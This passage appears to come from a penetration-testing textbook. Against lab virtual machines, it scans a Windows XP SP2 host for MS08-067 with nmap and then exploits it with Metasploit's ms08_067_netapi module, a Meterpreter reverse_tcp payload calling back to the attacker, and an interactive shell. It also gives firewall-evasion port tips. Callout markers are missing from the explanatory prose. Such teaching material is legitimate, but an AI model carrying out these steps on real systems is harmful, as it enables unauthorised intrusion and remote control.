With some of the basics behind us and an understanding of how to set variables within msfconsole, let’s exploit our first machine. To do so, fire up your Windows XP Service Pack 2 and Ubuntu 9.04 virtual machines. We’ll use Metasploit from within Back|Track.
If you used the vulnerability scanners discussed in Chapter 4 against your virtual Windows XP SP2 machine, you will have encountered the vulnerability we’ll exploit in this chapter: the MS08-067 exploit. We’ll begin by finding this vulnerability on our own.
As your skills as a penetration tester improve, the discovery of certain open ports will trigger ideas about how you might exploit a particular service. One of the best ways to conduct this check is by using nmap’s script options within Metasploit as shown here:
root@bt:/root#cd /opt/framework3/msf3/root@bt:/opt/framework3/msf3#msfconsole. . . SNIP . . .msf >nmap -sT -A --script=smb-check-vulns -P0 192.168.33.130[*] exec: nmap -sT -A --script=smb-check-vulns -P0 192.168.33.130 Starting Nmap 5.20 ( http://nmap.org ) at 2011-03-15 19:46 EDT Warning: Traceroute does not support idle or connect scan, disabling... NSE: Script Scanning completed. Nmap scan report for 192.168.33.130 Host is up (0.00050s latency). Not shown: 991 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd 25/tcp open smtp Microsoft ESMTP 6.0.2600.2180 80/tcp open http Microsoft IIS webserver 5.1 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 443/tcp open https? 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 1025/tcp open msrpc Microsoft Windows RPC 1433/tcp open ms-sql-s Microsoft SQL Server 2005 9.00.1399; RTM MAC Address: 00:0C:29:EA:26:7C (VMware) Device type: general purpose Running: Microsoft Windows XP|2003 OS details:
Microsoft Windows XP Professional SP2 or Windows Server 2003Network Distance: 1 hop Service Info: Host: ihazsecurity; OS: Windows Host script results: smb-check-vulns:
MS08-067: VULNERABLEConficker: Likely CLEAN regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run) SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run) OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 71.67 seconds msf >
Here, we call nmap from Metasploit with the --script=smb-check-vulns plug-in at . Notice the flags used while scanning the host with nmap. The -sT is a Stealth TCP connect, which we have found to be the most reliable flag when trying to enumerate ports. (Others prefer -sS, or Stealth Syn.) The -A specifies advanced OS detection, which does some additional banner grabs and footprinting of a specific service for us.
Notice in the results from nmap that MS08-067: VULNERABLE is reported at . This is a good indicator that we have a chance at exploiting this system. Let’s use Metasploit to find the exploit we want and attempt to compromise the system.
This exploit is specific to the operating system version, service pack, and language in use on the system, a result of the exploit bypassing Data Execution Prevention (DEP). DEP was created to help protect against buffer overflow attacks by rendering the stack read-only and thereby preventing arbitrarily placed shellcode from executing. However, we can bypass DEP and force Windows to make the stack writable by performing some complex stack manipulation. (For more on bypassing DEP, see http://www.uninformed.org/?v=2&a=4.)
In msf> show targets in msf> show targets, we used the show targets command, which lists each vulnerable version for this specific attack vector. Because MS08-067 is an exploit that is very specific regarding the OS version in use, we will manually set our target to make sure we trigger the correct overflow. Based on the nmap scan results shown in the preceding example, we can tell at that the system is running Windows XP Service Pack 2. (It is also identified as possibly Windows 2003, but the system is missing key ports that would be associated with the Server Edition.) We’ll assume that our target is running the English version of XP.
Let’s walk through the actual exploitation. First the setup:
msf >search ms08_067_netapiuse windows/smb/ms08_067_netapiset PAYLOAD windows/meterpreter/reverse_tcpshow targetsExploit targets: Id Name -- ---- 0 Automatic Targeting 1 Windows 2000 Universal 2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)4 Windows XP SP3 English (NX) 5 Windows 2003 SP0 Universal 6 Windows 2003 SP1 English (NO NX) 7 Windows 2003 SP1 English (NX) 8 Windows 2003 SP2 English (NO NX) 9 Windows 2003 SP2 English (NX)
. . . SNIP . . .26 Windows XP SP2 Japanese (NX). . . SNIP . . .msf exploit(ms08_067_netapi) >set TARGET 3target => 3 msf exploit(ms08_067_netapi) >set RHOST 192.168.33.130RHOST => 192.168.33.130 msf exploit(ms08_067_netapi) >
set LHOST 192.168.33.129LHOST => 192.168.33.129 msf exploit(ms08_067_netapi) >
set LPORT 8080LPORT => 8080 msf exploit(ms08_067_netapi) >
show optionsModule options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.33.130 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LHOST 192.168.33.129 yes The local address LPORT 8080 yes The local port Exploit target: Id Name -- ---- 3 Windows XP SP2 English (NX)
We search for the MS08-067 NetAPI exploit in the Framework at . Then, having found our exploit, we load the windows/smb/ms08_067_netapi exploit at .
Next, at we set the payload as Windows-based Meterpreter reverse_tcp, which, if successful, will start a connection on the target machine and connect back to the attacking machine specified with LHOST. This is important if you find that a firewall is in place and you need to bypass incoming controls on a firewall or NAT.
Meterpreter is a post exploitation tool that we’ll use through this book. One of Metasploit’s flagship tools, it makes extracting information or further compromising systems significantly easier.
The show targets command at allows us to identify the system we want to target. (Although many MSF exploits use automatic targeting and don’t require this flag, autodetection capability generally fails in MS08-067.)
We then set our target to Windows XP SP2 English (NX) at . The NX stands for No Execute. By default in Windows XP SP2, DEP is enabled.
At we set the IP address of our target machine which, by defining the RHOST value, is vulnerable to the MS08-067 exploit.
The set LHOST command at specifies our attacking machine’s IP address (the Back|Track machine), and the LPORT option at specifies the port to which our attacker machine will listen for a connection from our target. (When you’re setting the LPORT option, use a standard port that you think will be allowed through the firewall: Ports 443, 80, 53, and 8080 are often good options.) Finally, we enter show options at to make sure that the options are set up correctly.
Having set the stage, we’re ready to conduct the actual exploitation:
msf exploit(ms08_067_netapi) >exploitsessions -lsessions -i 1shell
The exploit command at initiates our exploit and attempts to attack the target. The attack succeeds and gives us a reverse_tcp Meterpreter payload at , which we can view with sessions -l at . Only one session is active, as shown at , but if we targeted multiple systems, several sessions could be open simultaneously. (To view a list of the exploits that created each session, you would enter sessions -l -v.)
The sessions -i 1 command is issued at to “interact” with an individual session. Notice that this drops us into a Meterpreter shell. If, for example, a reverse command shell existed, this command would drop us straight to a command prompt. And, finally, at we enter shell to jump into an interactive command shell on the target.
Congratulations! You’ve just compromised your first machine! To list the available commands for a particular exploit, you can enter show options.